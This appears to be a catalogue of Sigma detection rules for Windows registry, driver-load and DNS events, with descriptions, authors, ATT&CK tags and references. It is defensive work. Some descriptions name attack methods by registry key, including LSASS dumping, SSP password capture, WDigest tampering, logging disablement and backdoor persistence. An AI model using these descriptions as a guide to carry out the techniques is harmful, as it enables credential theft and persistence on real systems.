- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) |
| creation_date | 2020-10-20 |
| falsepositive | ['Unknown'] |
| filename | registry_event_esentutl_volume_shadow_copy_service_keys.yml |
| level | high |
| logsource.category | registry_event |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.t1003.002'] |
Related clusters
To see the related clusters, click here.
Registry Entries For Azorult Malware
Detects the presence of a registry key created during Azorult execution.
Internal MISP references
UUID f7f9ab88-7557-4a69-b30e-0a8f91b3a0e7 which can be used as unique global reference for Registry Entries For Azorult Malware in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Trent Liffick |
| creation_date | 2020-05-08 |
| falsepositive | ['Unknown'] |
| filename | registry_event_mal_azorult.yml |
| level | critical |
| logsource.category | registry_event |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.persistence', 'attack.execution', 'attack.t1112'] |
Related clusters
To see the related clusters, click here.
Potential Qakbot Registry Activity
Detects a registry key used by IceID in a campaign that distributes malicious OneNote files.
Internal MISP references
UUID 1c8e96cd-2bed-487d-9de0-b46c90cade56 which can be used as unique global reference for Potential Qakbot Registry Activity in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Hieu Tran |
| creation_date | 2023-03-13 |
| falsepositive | ['Unknown'] |
| filename | registry_event_malware_qakbot_registry.yml |
| level | high |
| logsource.category | registry_event |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.defense-evasion', 'attack.t1112'] |
Related clusters
To see the related clusters, click here.
Windows Credential Editor Registry
Detects the use of Windows Credential Editor (WCE).
Internal MISP references
UUID a6b33c02-8305-488f-8585-03cb2a7763f2 which can be used as unique global reference for Windows Credential Editor Registry in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2019-12-31 |
| falsepositive | ['Unknown'] |
| filename | registry_event_hack_wce_reg.yml |
| level | critical |
| logsource.category | registry_event |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.t1003.001', 'attack.s0005'] |
Related clusters
To see the related clusters, click here.
Path To Screensaver Binary Modified
Detects modification of the registry value containing the path to the binary used as the screensaver.
Internal MISP references
UUID 67a6c006-3fbe-46a7-9074-2ba3b82c3000 which can be used as unique global reference for Path To Screensaver Binary Modified in MISP communities and other software using the MISP galaxy
External references
- https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_modify_screensaver_binary_path.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Bartlomiej Czyz @bczyz1, oscd.community |
| creation_date | 2020-10-11 |
| falsepositive | ['Legitimate modification of screensaver'] |
| filename | registry_event_modify_screensaver_binary_path.yml |
| level | medium |
| logsource.category | registry_event |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.privilege-escalation', 'attack.t1546.002'] |
Related clusters
To see the related clusters, click here.
Disable Security Events Logging Adding Reg Key MiniNt
Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, the Windows Event Log service will stop writing events.
Internal MISP references
UUID 919f2ef0-be2d-4a7a-b635-eb2b41fde044 which can be used as unique global reference for Disable Security Events Logging Adding Reg Key MiniNt in MISP communities and other software using the MISP galaxy
External references
- https://twitter.com/0gtweet/status/1182516740955226112 - webarchive
- https://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_disable_security_events_logging_adding_reg_key_minint.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Ilyas Ochkov, oscd.community |
| creation_date | 2019-10-25 |
| falsepositive | ['Unknown'] |
| filename | registry_event_disable_security_events_logging_adding_reg_key_minint.yml |
| level | high |
| logsource.category | registry_event |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.defense-evasion', 'attack.t1562.002', 'attack.t1112', 'car.2022-03-001'] |
Related clusters
To see the related clusters, click here.
Office Application Startup - Office Test
Detects the addition of the Office Test registry key, which allows a user to specify an arbitrary DLL that will be executed every time an Office application is started.
Internal MISP references
UUID 3d27f6dd-1c74-4687-b4fa-ca849d128d1c which can be used as unique global reference for Office Application Startup - Office Test in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | omkar72 |
| creation_date | 2020-10-25 |
| falsepositive | ['Unlikely'] |
| filename | registry_event_office_test_regadd.yml |
| level | medium |
| logsource.category | registry_event |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.t1137.002'] |
Related clusters
To see the related clusters, click here.
Suspicious Run Key from Download
Detects suspicious Run keys created by software located in the Download directory or in temporary Outlook/Internet Explorer directories.
Internal MISP references
UUID 9c5037d1-c568-49b3-88c7-9846a5bdc2be which can be used as unique global reference for Suspicious Run Key from Download in MISP communities and other software using the MISP galaxy
External references
- https://github.com/HackTricks-wiki/hacktricks/blob/e4c7b21b8f36c97c35b7c622732b38a189ce18f7/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md - webarchive
- https://app.any.run/tasks/c5bef5b7-f484-4c43-9cf3-d5c5c7839def/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_download_run_key.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems) |
| creation_date | 2019-10-01 |
| falsepositive | ['Software installers downloaded and used by users'] |
| filename | registry_event_susp_download_run_key.yml |
| level | high |
| logsource.category | registry_event |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.001'] |
Related clusters
To see the related clusters, click here.
HybridConnectionManager Service Installation - Registry
Detects the installation of the Azure Hybrid Connection Manager service, which allows remote code execution from an Azure function.
Internal MISP references
UUID ac8866c7-ce44-46fd-8c17-b24acff96ca8 which can be used as unique global reference for HybridConnectionManager Service Installation - Registry in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) |
| creation_date | 2021-04-12 |
| falsepositive | ['Unknown'] |
| filename | registry_event_hybridconnectionmgr_svc_installation.yml |
| level | high |
| logsource.category | registry_event |
| logsource.product | windows |
| tags | ['attack.resource-development', 'attack.t1608'] |
Related clusters
To see the related clusters, click here.
Security Support Provider (SSP) Added to LSA Configuration
Detects the addition of an SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.
Internal MISP references
UUID eeb30123-9fbd-4ee8-aaa0-2e545bbed6dc which can be used as unique global reference for Security Support Provider (SSP) Added to LSA Configuration in MISP communities and other software using the MISP galaxy
External references
- https://powersploit.readthedocs.io/en/latest/Persistence/Install-SSP/ - webarchive
- https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/persistence/Install-SSP.ps1#L157 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_ssp_added_lsa_config.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | iwillkeepwatch |
| creation_date | 2019-01-18 |
| falsepositive | ['Unknown'] |
| filename | registry_event_ssp_added_lsa_config.yml |
| level | high |
| logsource.category | registry_event |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.005'] |
Related clusters
To see the related clusters, click here.
Potential Credential Dumping Via LSASS SilentProcessExit Technique
Detects changes to the registry in which a monitor program gets registered to dump the memory of the lsass.exe process.
Internal MISP references
UUID 55e29995-75e7-451a-bef0-6225e2f13597 which can be used as unique global reference for Potential Credential Dumping Via LSASS SilentProcessExit Technique in MISP communities and other software using the MISP galaxy
External references
- https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/ - webarchive
- https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_silentprocessexit_lsass.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2021-02-26 |
| falsepositive | ['Unlikely'] |
| filename | registry_event_silentprocessexit_lsass.yml |
| level | critical |
| logsource.category | registry_event |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.t1003.001'] |
Suspicious Camera and Microphone Access
Detects processes accessing the camera and microphone from a suspicious folder
Internal MISP references
UUID 62120148-6b7a-42be-8b91-271c04e281a3 which can be used as unique global reference for Suspicious Camera and Microphone Access in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Den Iuzvyk |
| creation_date | 2020-06-07 |
| falsepositive | ['Unlikely, there could be conferencing software running from a Temp folder accessing the devices'] |
| filename | registry_event_susp_mic_cam_access.yml |
| level | high |
| logsource.category | registry_event |
| logsource.product | windows |
| tags | ['attack.collection', 'attack.t1125', 'attack.t1123'] |
Wdigest CredGuard Registry Modification
Detects potential malicious modification of the property value of IsCredGuardEnabled under HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to disable Credential Guard on a system. This is usually used together with UseLogonCredential to manipulate the caching of credentials.
Internal MISP references
UUID 1a2d6c47-75b0-45bd-b133-2c0be75349fd which can be used as unique global reference for Wdigest CredGuard Registry Modification in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) |
| creation_date | 2019-08-25 |
| falsepositive | ['Unknown'] |
| filename | registry_event_disable_wdigest_credential_guard.yml |
| level | high |
| logsource.category | registry_event |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.defense-evasion', 'attack.t1112'] |
RedMimicry Winnti Playbook Registry Manipulation
Detects actions caused by the RedMimicry Winnti playbook
Internal MISP references
UUID 5b175490-b652-4b02-b1de-5b5b4083c5f8 which can be used as unique global reference for RedMimicry Winnti Playbook Registry Manipulation in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Alexander Rausch |
| creation_date | 2020-06-24 |
| falsepositive | ['Unknown'] |
| filename | registry_event_redmimicry_winnti_reg.yml |
| level | high |
| logsource.category | registry_event |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.defense-evasion', 'attack.t1112'] |
Enable Remote Connection Between Anonymous Computer - AllowAnonymousCallback
Detects enabling of the "AllowAnonymousCallback" registry value, which allows a remote connection between computers that do not have a trust relationship.
Internal MISP references
UUID 4d431012-2ab5-4db7-a84e-b29809da2172 which can be used as unique global reference for Enable Remote Connection Between Anonymous Computer - AllowAnonymousCallback in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | X__Junior (Nextron Systems) |
| creation_date | 2023-11-03 |
| falsepositive | ['Administrative activity'] |
| filename | registry_set_enable_anonymous_connection.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1562.001'] |
Sticky Key Like Backdoor Usage - Registry
Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
Internal MISP references
UUID baca5663-583c-45f9-b5dc-ea96a22ce542 which can be used as unique global reference for Sticky Key Like Backdoor Usage - Registry in MISP communities and other software using the MISP galaxy
External references
- https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/ - webarchive
- https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_stickykey_like_backdoor.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community |
| creation_date | 2018-03-15 |
| falsepositive | ['Unlikely'] |
| filename | registry_event_stickykey_like_backdoor.yml |
| level | critical |
| logsource.category | registry_event |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1546.008', 'car.2014-11-003', 'car.2014-11-008'] |
DLL Load via LSASS
Detects a method of loading a DLL via the LSASS process using an undocumented registry key
Internal MISP references
UUID b3503044-60ce-4bf4-bbcb-e3db98788823 which can be used as unique global reference for DLL Load via LSASS in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2019-10-16 |
| falsepositive | ['Unknown'] |
| filename | registry_event_susp_lsass_dll_load.yml |
| level | high |
| logsource.category | registry_event |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.execution', 'attack.persistence', 'attack.t1547.008'] |
NetNTLM Downgrade Attack - Registry
Detects a NetNTLM downgrade attack
Internal MISP references
UUID d67572a0-e2ec-45d6-b8db-c100d14b8ef2 which can be used as unique global reference for NetNTLM Downgrade Attack - Registry in MISP communities and other software using the MISP galaxy
External references
- https://web.archive.org/web/20171113231705/https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks - webarchive
- https://www.ultimatewindowssecurity.com/wiki/page.aspx?spid=NSrpcservers - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_net_ntlm_downgrade.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems), wagga, Nasreddine Bencherchali (Splunk STRT) |
| creation_date | 2018-03-20 |
| falsepositive | ['Services or tools that set the values to more restrictive values'] |
| filename | registry_event_net_ntlm_downgrade.yml |
| level | high |
| logsource.category | registry_event |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.defense-evasion', 'attack.t1562.001', 'attack.t1112'] |
WINEKEY Registry Modification
Detects potential malicious modification of Run keys by the WINEKEY or team9 backdoor
Internal MISP references
UUID b98968aa-dbc0-4a9c-ac35-108363cbf8d5 which can be used as unique global reference for WINEKEY Registry Modification in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | omkar72 |
| creation_date | 2020-10-30 |
| falsepositive | ['Unknown'] |
| filename | registry_event_runkey_winekey.yml |
| level | high |
| logsource.category | registry_event |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547'] |
CMSTP Execution Registry Event
Detects various indicators of Microsoft Connection Manager Profile Installer execution
Internal MISP references
UUID b6d235fc-1d38-4b12-adbe-325f06728f37 which can be used as unique global reference for CMSTP Execution Registry Event in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nik Seetharaman |
| creation_date | 2018-07-16 |
| falsepositive | ['Legitimate CMSTP use (unlikely in modern enterprise environments)'] |
| filename | registry_event_cmstp_execution_by_registry.yml |
| level | high |
| logsource.category | registry_event |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.execution', 'attack.t1218.003', 'attack.g0069', 'car.2019-04-001'] |
PUA - Sysinternals Tools Execution - Registry
Detects the execution of some potentially unwanted tools such as PsExec, Procdump, etc. (part of the Sysinternals suite) via the creation of the "accepteula" registry key.
Internal MISP references
UUID c7da8edc-49ae-45a2-9e61-9fd860e4e73d which can be used as unique global reference for PUA - Sysinternals Tools Execution - Registry in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-08-24 |
| falsepositive | ['Legitimate use of SysInternals tools. Filter the legitimate paths used in your environment'] |
| filename | registry_add_pua_sysinternals_susp_execution_via_eula.yml |
| level | medium |
| logsource.category | registry_add |
| logsource.product | windows |
| tags | ['attack.resource-development', 'attack.t1588.002'] |
Suspicious Execution Of Renamed Sysinternals Tools - Registry
Detects the creation of the "accepteula" registry key associated with the Sysinternals tools by executables with a different name than expected (e.g. a renamed Sysinternals tool)
Internal MISP references
UUID f50f3c09-557d-492d-81db-9064a8d4e211 which can be used as unique global reference for Suspicious Execution Of Renamed Sysinternals Tools - Registry in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-08-24 |
| falsepositive | ['Unlikely'] |
| filename | registry_add_pua_sysinternals_renamed_execution_via_eula.yml |
| level | high |
| logsource.category | registry_add |
| logsource.product | windows |
| tags | ['attack.resource-development', 'attack.t1588.002'] |
Potential COM Object Hijacking Via TreatAs Subkey - Registry
Detects COM object hijacking via TreatAs subkey
Internal MISP references
UUID 9b0f8a61-91b2-464f-aceb-0527e0a45020 which can be used as unique global reference for Potential COM Object Hijacking Via TreatAs Subkey - Registry in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Kutepov Anton, oscd.community |
| creation_date | 2019-10-23 |
| falsepositive | ['Maybe some system utilities in rare cases use linking keys for backward compatibility'] |
| filename | registry_add_persistence_com_key_linking.yml |
| level | medium |
| logsource.category | registry_add |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1546.015'] |
PUA - Sysinternal Tool Execution - Registry
Detects the execution of a Sysinternals Tool via the creation of the "accepteula" registry key
Internal MISP references
UUID 25ffa65d-76d8-4da5-a832-3f2b0136e133 which can be used as unique global reference for PUA - Sysinternal Tool Execution - Registry in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Markus Neis |
| creation_date | 2017-08-28 |
| falsepositive | ['Legitimate use of SysInternals tools', 'Programs that use the same Registry Key'] |
| filename | registry_add_pua_sysinternals_execution_via_eula.yml |
| level | low |
| logsource.category | registry_add |
| logsource.product | windows |
| tags | ['attack.resource-development', 'attack.t1588.002'] |
Potential Persistence Via New AMSI Providers - Registry
Detects when an attacker registers a new AMSI provider in order to achieve persistence
Internal MISP references
UUID 33efc23c-6ea2-4503-8cfe-bdf82ce8f705 which can be used as unique global reference for Potential Persistence Via New AMSI Providers - Registry in MISP communities and other software using the MISP galaxy
External references
- https://persistence-info.github.io/Data/amsi.html - webarchive
- https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/FakeAMSI/FakeAMSI.c - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_persistence_amsi_providers.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-07-21 |
| falsepositive | ['Legitimate security products adding their own AMSI providers. Filter these according to your environment'] |
| filename | registry_add_persistence_amsi_providers.yml |
| level | high |
| logsource.category | registry_add |
| logsource.product | windows |
| tags | ['attack.persistence'] |
Potential Persistence Via Disk Cleanup Handler - Registry
Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence. The disk cleanup manager is part of the operating system. It displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI. Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications. Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler. Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.
Internal MISP references
UUID d4f4e0be-cf12-439f-9e25-4e2cdcf7df5a which can be used as unique global reference for Potential Persistence Via Disk Cleanup Handler - Registry in MISP communities and other software using the MISP galaxy
External references
- https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/ - webarchive
- https://persistence-info.github.io/Data/diskcleanuphandler.html - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_persistence_disk_cleanup_handler_entry.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-07-21 |
| falsepositive | ['Legitimate new entry added by windows'] |
| filename | registry_add_persistence_disk_cleanup_handler_entry.yml |
| level | medium |
| logsource.category | registry_add |
| logsource.product | windows |
| tags | ['attack.persistence'] |
Potential Persistence Via Logon Scripts - Registry
Detects creation of "UserInitMprLogonScript" registry value which can be used as a persistence method by malicious actors
Internal MISP references
UUID 9ace0707-b560-49b8-b6ca-5148b42f39fb which can be used as unique global reference for Potential Persistence Via Logon Scripts - Registry in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Tom Ueltschi (@c_APT_ure) |
| creation_date | 2019-01-12 |
| falsepositive | ['Investigate the contents of the "UserInitMprLogonScript" value to determine if the added script is legitimate'] |
| filename | registry_add_persistence_logon_scripts_userinitmprlogonscript.yml |
| level | medium |
| logsource.category | registry_add |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.t1037.001', 'attack.persistence', 'attack.lateral-movement'] |
Vulnerable WinRing0 Driver Load
Detects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation
Internal MISP references
UUID 1a42dfa6-6cb2-4df9-9b48-295be477e835 which can be used as unique global reference for Vulnerable WinRing0 Driver Load in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2022-07-26 |
| falsepositive | ['Unknown'] |
| filename | driver_load_win_vuln_winring0_driver.yml |
| level | high |
| logsource.category | driver_load |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.privilege-escalation', 'attack.t1543.003'] |
Driver Load From A Temporary Directory
Detects a driver load from a temporary directory
Internal MISP references
UUID 2c4523d5-d481-4ed0-8ec3-7fbf0cb41a75 which can be used as unique global reference for Driver Load From A Temporary Directory in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2017-02-12 |
| falsepositive | ['There is a relevant set of false positives depending on applications in the environment'] |
| filename | driver_load_win_susp_temp_use.yml |
| level | high |
| logsource.category | driver_load |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.privilege-escalation', 'attack.t1543.003'] |
PUA - Process Hacker Driver Load
Detects driver load of the Process Hacker tool
Internal MISP references
UUID 67add051-9ee7-4ad3-93ba-42935615ae8d which can be used as unique global reference for PUA - Process Hacker Driver Load in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2022-11-16 |
| falsepositive | ['Legitimate use of process hacker or system informer by developers or system administrators'] |
| filename | driver_load_win_pua_process_hacker.yml |
| level | high |
| logsource.category | driver_load |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.privilege-escalation', 'cve.2021-21551', 'attack.t1543'] |
PUA - System Informer Driver Load
Detects driver load of the System Informer tool
Internal MISP references
UUID 10cb6535-b31d-4512-9962-513dcbc42cc1 which can be used as unique global reference for PUA - System Informer Driver Load in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2023-05-08 |
| falsepositive | ['System Informer is regularly used legitimately by system administrators or developers. Apply additional filters accordingly'] |
| filename | driver_load_win_pua_system_informer.yml |
| level | medium |
| logsource.category | driver_load |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.privilege-escalation', 'attack.t1543'] |
Malicious Driver Load By Name
Detects loading of known malicious drivers via the file name of the drivers.
Internal MISP references
UUID 39b64854-5497-4b57-a448-40977b8c9679 which can be used as unique global reference for Malicious Driver Load By Name in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-10-03 |
| falsepositive | ["False positives may occur if one of the vulnerable driver names mentioned above didn't change its name between versions. So always make sure that the driver being loaded is the legitimate one and the non vulnerable version.", 'If you experience a lot of FP you could comment the driver name or its exact known legitimate location (when possible)'] |
| filename | driver_load_win_mal_drivers_names.yml |
| level | medium |
| logsource.category | driver_load |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.privilege-escalation', 'attack.t1543.003', 'attack.t1068'] |
Vulnerable Driver Load
Detects loading of known vulnerable drivers via their hash.
Internal MISP references
UUID 7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8 which can be used as unique global reference for Vulnerable Driver Load in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-08-18 |
| falsepositive | ['Unknown'] |
| filename | driver_load_win_vuln_drivers.yml |
| level | high |
| logsource.category | driver_load |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.privilege-escalation', 'attack.t1543.003', 'attack.t1068'] |
Vulnerable Driver Load By Name
Detects the load of known vulnerable drivers via the file name of the drivers.
Internal MISP references
UUID 72cd00d6-490c-4650-86ff-1d11f491daa1 which can be used as unique global reference for Vulnerable Driver Load By Name in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-10-03 |
| falsepositive | ["False positives may occur if one of the vulnerable driver names mentioned above didn't change its name between versions. So always make sure that the driver being loaded is the legitimate one and the non vulnerable version.", 'If you experience a lot of FP you could comment the driver name or its exact known legitimate location (when possible)'] |
| filename | driver_load_win_vuln_drivers_names.yml |
| level | low |
| logsource.category | driver_load |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.privilege-escalation', 'attack.t1543.003', 'attack.t1068'] |
Malicious Driver Load
Detects loading of known malicious drivers via their hash.
Internal MISP references
UUID 05296024-fe8a-4baf-8f3d-9a5f5624ceb2 which can be used as unique global reference for Malicious Driver Load in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-08-18 |
| falsepositive | ['Unknown'] |
| filename | driver_load_win_mal_drivers.yml |
| level | high |
| logsource.category | driver_load |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.privilege-escalation', 'attack.t1543.003', 'attack.t1068'] |
Vulnerable HackSys Extreme Vulnerable Driver Load
Detects the load of the HackSys Extreme Vulnerable Driver, an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their kernel-level exploitation skills, which is often abused by threat actors
Internal MISP references
UUID 295c9289-acee-4503-a571-8eacaef36b28 which can be used as unique global reference for Vulnerable HackSys Extreme Vulnerable Driver Load in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-08-18 |
| falsepositive | ['Unlikely'] |
| filename | driver_load_win_vuln_hevd_driver.yml |
| level | high |
| logsource.category | driver_load |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.privilege-escalation', 'attack.t1543.003'] |
WinDivert Driver Load
Detects the load of the WinDivert driver, a powerful user-mode packet capture/sniffing/modification/blocking/re-injection package for Windows
Internal MISP references
UUID 679085d5-f427-4484-9f58-1dc30a7c426d which can be used as unique global reference for WinDivert Driver Load in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2021-07-30 |
| falsepositive | ['Legitimate WinDivert driver usage'] |
| filename | driver_load_win_windivert.yml |
| level | high |
| logsource.category | driver_load |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.collection', 'attack.defense-evasion', 'attack.t1599.001', 'attack.t1557.001'] |
Suspicious Cobalt Strike DNS Beaconing - Sysmon
Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons
Internal MISP references
UUID f356a9c4-effd-4608-bbf8-408afd5cd006 which can be used as unique global reference for Suspicious Cobalt Strike DNS Beaconing - Sysmon in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2021-11-09 |
| falsepositive | ['Unknown'] |
| filename | dns_query_win_mal_cobaltstrike.yml |
| level | critical |
| logsource.category | dns_query |
| logsource.product | windows |
| tags | ['attack.command-and-control', 'attack.t1071.004'] |
Cloudflared Tunnels Related DNS Requests
Detects DNS requests to Cloudflared tunnel domains. Attackers can abuse this feature to establish a reverse shell or persistence on a machine.
Internal MISP references
UUID a1d9eec5-33b2-4177-8d24-27fe754d0812 which can be used as unique global reference for Cloudflared Tunnels Related DNS Requests in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-12-20 |
| falsepositive | ['Legitimate use of cloudflare tunnels will also trigger this.'] |
| filename | dns_query_win_cloudflared_communication.yml |
| level | medium |
| logsource.category | dns_query |
| logsource.product | windows |
| tags | ['attack.command-and-control', 'attack.t1071.001', 'attack.t1572'] |
DNS Query To Common Malware Hosting and Shortener Services
